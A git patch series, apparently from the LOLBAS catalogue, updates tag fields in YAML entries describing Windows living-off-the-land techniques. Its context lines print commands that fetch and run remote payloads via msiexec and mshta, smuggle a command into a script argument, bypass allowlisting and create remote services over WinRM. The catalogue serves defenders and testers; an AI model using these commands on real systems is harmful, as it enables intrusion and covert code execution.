@@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: MSI - - Input: Custom Format - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png Description: Installs the target remote & renamed .MSI file silently. Usecase: Execute custom made msi file with attack code from remote server @@ -24,7 +23,6 @@ Commands: Tags: - Execute: MSI - Execute: Remote - - Input: Custom Format - Command: msiexec /y "C:\folder\evil.dll" Description: Calls DllRegisterServer to register the target DLL. Usecase: Execute dll files @@ -35,7 +33,6 @@ Commands: Tags: - Execute: DLL - Execute: Remote - - Input: Custom Format - Command: msiexec /z "C:\folder\evil.dll" Description: Calls DllUnregisterServer to un-register the target DLL. Usecase: Execute dll files @@ -46,7 +43,6 @@ Commands: Tags: - Execute: DLL - Execute: Remote - - Input: Custom Format - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input. Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server @@ -56,7 +52,6 @@ Commands: OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: Remote - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe From c34810b29b1e9f787bcf0baf84da51c0d2e8aa22 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:08:27 +0200 Subject: [PATCH 077/148] Update Mshta.yml Tags Changed Execute: WSH to HTA --- yml/OSBinaries/Mshta.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index 355b5470..eb8167d4 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: HTA - Execute: Remote - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) Description: Executes VBScript supplied as a command line argument. @@ -40,7 +40,7 @@ Commands: MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) Tags: - - Execute: WSH + - Execute: HTA - Command: mshta.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server From e25d9fa435a6341c6b27b451ed49c677f4089175 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:10:51 +0200 Subject: [PATCH 078/148] Update Advpack.yml Tags Added Tags: Execute: INF Execute: EXE Execute: CMD --- yml/OSLibraries/Advpack.yml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index b09f76a0..f445a41a 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: INF - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. 
@@ -19,7 +21,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF - Command: rundll32.exe advpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. @@ -36,6 +38,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. @@ -43,6 +47,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\advpack.dll - Path: c:\windows\syswow64\advpack.dll From 87241b3051445298fb770639bca5d5624d6cc79d Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:13:30 +0200 Subject: [PATCH 079/148] Update Desk.yml Tags Added Tags: Execute: EXE Execute: Remote --- yml/OSLibraries/Desk.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/yml/OSLibraries/Desk.yml b/yml/OSLibraries/Desk.yml index 163badf0..935a6f56 100644 --- a/yml/OSLibraries/Desk.yml +++ b/yml/OSLibraries/Desk.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function. Usecase: Launch any executable payload, as long as it uses the .scr extension. @@ -18,6 +20,9 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE + - Execute: Remote Full_Path: - Path: C:\Windows\System32\desk.cpl - Path: C:\Windows\SysWOW64\desk.cpl 
From f08605710402a2684e398080aa7da120584ab2c7 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:14:56 +0200 Subject: [PATCH 080/148] Update Dfshim.yml Tags Added Tags: - Execute: ClickOnce - Execute: Remote --- yml/OSLibraries/Dfshim.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSLibraries/Dfshim.yml b/yml/OSLibraries/Dfshim.yml index 36fd9d9a..6f76b896 100644 --- a/yml/OSLibraries/Dfshim.yml +++ b/yml/OSLibraries/Dfshim.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: ClickOne + - Execute: Remote Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe From f09cfa5b8cbeb7e77e35fcdfe0357ce506f3fe53 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:16:43 +0200 Subject: [PATCH 081/148] Update Ieadvpack.yml Tags Added Tags: - Execute INF - Execute EXE - Execute CMD --- yml/OSLibraries/Ieadvpack.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 5b745646..bda0f4cb 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: INF - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. 
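Review bot: The tag value `ClickOne` added in the Dfshim.yml hunk is a typo for `ClickOnce`, the spelling used in this commit's own subject line and the name of the deployment technology dfsvc.exe/dfshim.dll handle; the line should read `- Execute: ClickOnce`. Tag values are plain YAML strings, so the misspelt form would presumably surface as a one-off category instead of grouping with any other ClickOnce entries. If the YAML lint and schema validation workflow referenced earlier in this series enumerates permitted Tags values, the new value likely needs to be registered there as well.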
@@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: INF - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. @@ -34,6 +38,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. @@ -41,6 +47,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\ieadvpack.dll - Path: c:\windows\syswow64\ieadvpack.dll From 0672acf1da201b6dcbd5d65f7266e5433741bd47 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:19:05 +0200 Subject: [PATCH 082/148] Update Ieframe.yml Tags Added Tags: Execute: EXE --- yml/OSLibraries/Ieframe.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 5bcb8b4c..6ee5a3f3 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\ieframe.dll - Path: c:\windows\syswow64\ieframe.dll From 98dde3b672cb56f433679ae1e789344014ddd9f8 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:20:21 +0200 Subject: [PATCH 083/148] Update Mshtml.yml Tags Added Tags: Executable HTA --- yml/OSLibraries/Mshtml.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 576dd097..a7701fe9 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml 
@@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: HTA Full_Path: - Path: c:\windows\system32\mshtml.dll - Path: c:\windows\syswow64\mshtml.dll From 25047c34d9b694610af362b319147df17b9f1893 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:21:47 +0200 Subject: [PATCH 084/148] Update Pcwutl.yml Tags Added Tags: Execute EXE --- yml/OSLibraries/Pcwutl.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index 61fd9196..407d41c5 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\pcwutl.dll - Path: c:\windows\syswow64\pcwutl.dll From b1d0a85d2ee8fab0354d130e46c9694d8ed84fa5 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:25:38 +0200 Subject: [PATCH 085/148] Update Setupapi.yml Tags Changed Input: INF to Execute:INF for consistency --- yml/OSLibraries/Setupapi.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index e5b6ccc2..b6836b62 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. Usecase: Load an executable payload. 
@@ -21,7 +21,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows Tags: - - Input: INF + - Execute: INF Full_Path: - Path: c:\windows\system32\setupapi.dll - Path: c:\windows\syswow64\setupapi.dll From a28f2a756ab5bc90ca5e87ac42518d6ff494c8ef Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:26:39 +0200 Subject: [PATCH 086/148] Update Shdocvw.yml Tags Added Tags: Execute EXE --- yml/OSLibraries/Shdocvw.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index e7ab9a08..7514068c 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\shdocvw.dll - Path: c:\windows\syswow64\shdocvw.dll From eb9dfdee1791c9749a533b9b0af24a99e00ceccf Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:27:37 +0200 Subject: [PATCH 087/148] Update Shell32.yml Tags Added Tags: Execute EXE Execute CMD --- yml/OSLibraries/Shell32.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index 97e10ab8..48488674 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -20,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" Description: Launch command line by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. @@ -27,6 +29,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\shell32.dll - Path: c:\windows\syswow64\shell32.dll 
From 7533fea6b631d883af2c986bd3cdf35ff0a70ac3 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:28:39 +0200 Subject: [PATCH 088/148] Update Syssetup.yml Tags Changed Input: INF to Execute: INFO for consistency --- yml/OSLibraries/Syssetup.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index ac5cce27..3b01659c 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. Usecase: Load an executable payload. @@ -21,7 +21,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF Full_Path: - Path: c:\windows\system32\syssetup.dll - Path: c:\windows\syswow64\syssetup.dll From 5a169e4d600bf47e78274cee8797186614f03bec Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:32:25 +0200 Subject: [PATCH 089/148] Update Url.yml Tags Added Tags: Execute HTA Execute EXE --- yml/OSLibraries/Url.yml | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index 8e7a0702..29b58e9f 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: HTA - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. Usecase: Load an executable payload by calling a .url file with or without quotes. 
@@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling OpenURL. Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe Description: Launch an executable by calling FileProtocolHandler. Usecase: Launch an executable. @@ -32,6 +38,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling FileProtocolHandler. Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). @@ -39,6 +47,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta Description: Launch a HTML application payload by calling FileProtocolHandler. Usecase: Invoke an HTML Application via mshta.exe (Default Handler). @@ -46,6 +56,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: HTA Full_Path: - Path: c:\windows\system32\url.dll - Path: c:\windows\syswow64\url.dll From 9ebae9a6fbb4d294a87e229c2e576b0dd22be2b7 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:34:26 +0200 Subject: [PATCH 090/148] Update Zipfldr.yml Tags Added Tags Execute EXE --- yml/OSLibraries/Zipfldr.yml | 4 ++++ 1 file changed, 4 insertions(+) 
diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index e107b5e6..a7c1355d 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable payload by calling RouteTheCall (obfuscated). Usecase: Launch an executable. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\zipfldr.dll - Path: c:\windows\syswow64\zipfldr.dll From 1f57c1484503ffa4a8af6abedd09052ca28f3f03 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:44:40 +0200 Subject: [PATCH 091/148] Update CL_LoadAssembly.yml Tags Changed DLL to .NetDLL --- yml/OSScripts/CL_LoadAssembly.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 4298de42..250f1009 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Tags: - - Execute: DLL + - Execute: .NetDLL Full_Path: - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 Code_Sample: From cb73a1cfd01be67b89d8910591690529e0dd633a Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:47:36 +0200 Subject: [PATCH 092/148] Update CL_mutexverifiers.yml tags added tags: Execute: powershell --- yml/OSScripts/CL_mutexverifiers.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 37099e57..27cbea78 100644 
--- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10 + Tags: + - Execute: Powershell Full_Path: - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 From 4c232b06fe02c4f1ad9224bc76f4d4f0b7d2c213 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:52:43 +0200 Subject: [PATCH 093/148] Update Cl_invocation.yml Tags Added Tags: Execute EXE Execute CMD --- yml/OSScripts/Cl_invocation.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml index c7b884d2..783eea71 100644 --- a/yml/OSScripts/Cl_invocation.yml +++ b/yml/OSScripts/Cl_invocation.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10 + Tags: + - Execute: EXE + - Execute: CMD Full_Path: - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 From a7b0dfcf5eb6d73f6bcd022ab7f0b73c4567c446 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:53:59 +0200 Subject: [PATCH 094/148] Update Launch-VsDevShell.yml Tags Added Tags Execute EXE --- yml/OSScripts/Launch-VsDevShell.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSScripts/Launch-VsDevShell.yml b/yml/OSScripts/Launch-VsDevShell.yml index d5bb9b2a..72d32fb0 100644 --- a/yml/OSScripts/Launch-VsDevShell.yml +++ b/yml/OSScripts/Launch-VsDevShell.yml 
@@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsInstallationPath "/../../../../../; calc.exe ;"' Description: Execute binaries and commands from the context of the signed script using the "VsInstallationPath" flag. Usecase: Proxy execution @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Launch-VsDevShell.ps1 - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\Launch-VsDevShell.ps1 From 4295f690a1e340e29be02b0522709b6e41dd0345 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:56:48 +0200 Subject: [PATCH 095/148] Update Manage-bde.yml Tags Added Tags: Execute EXE --- yml/OSScripts/Manage-bde.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml index cf3c4b7f..4b1441c1 100644 --- a/yml/OSScripts/Manage-bde.yml +++ b/yml/OSScripts/Manage-bde.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file. Usecase: Proxy execution from script @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\manage-bde.wsf Code_Sample: 
From 8673165d4b46aa4b4f0b8f1cc094bdbd775a8148 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 20:18:06 +0200 Subject: [PATCH 096/148] Update Pubprn.yml Tags Added Tags: Execute SCT --- yml/OSScripts/Pubprn.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSScripts/Pubprn.yml b/yml/OSScripts/Pubprn.yml index d913b862..18985ac4 100644 --- a/yml/OSScripts/Pubprn.yml +++ b/yml/OSScripts/Pubprn.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216.001 OperatingSystem: Windows 10 + Tags: + - Execute: SCT Full_Path: - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs - Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs From 66510df000735d44e31200a31cee860def955962 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 20:18:52 +0200 Subject: [PATCH 097/148] Update Syncappvpublishingserver.yml Tags Added Tags: Execute: Powershell --- yml/OSScripts/Syncappvpublishingserver.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml index 64ef7b93..10e39e50 100644 --- a/yml/OSScripts/Syncappvpublishingserver.yml +++ b/yml/OSScripts/Syncappvpublishingserver.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216.002 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: Powershell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs Detection: From ac7ac2af006162e71a5e0ff267ec9f9df57af689 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 20:19:59 +0200 Subject: [PATCH 098/148] Update UtilityFunctions.yml Tags Changed Execute DLL to Execute .NetDLL --- yml/OSScripts/UtilityFunctions.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index 26109da6..5e16964e 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Tags: - - Execute: DLL + - Execute: .NetDLL Full_Path: - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 Code_Sample: From 76060761ae6c2049611b044d50466db076964f38 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 20:21:46 +0200 Subject: [PATCH 099/148] Update Winrm.yml Tags Added Tags: Execute: CMD Execute: Remote --- yml/OSScripts/Winrm.yml | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index ecfee7e2..5f0e1564 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD + - Execute: Remote - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol Usecase: Proxy execution 
@@ -18,6 +21,9 @@ Commands: Privileges: Admin MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD + - Execute: Remote - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty' Description: Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe. Usecase: Execute arbitrary, unsigned code via XSL script @@ -25,6 +31,9 @@ Commands: Privileges: User MitreID: T1220 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD + - Execute: Remote Full_Path: - Path: C:\Windows\System32\winrm.vbs - Path: C:\Windows\SysWOW64\winrm.vbs From 43ae6c8a1b9b9a8ace0d8e2b528d2d3d1c99d9df Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 20:23:33 +0200 Subject: [PATCH 100/148] Update pester.yml Tags and removed duplicate Removed Duplicate Command field Added Tags: - Execute EXE --- yml/OSScripts/pester.yml | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index 237afa95..c8b1d9f5 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -11,6 +11,8 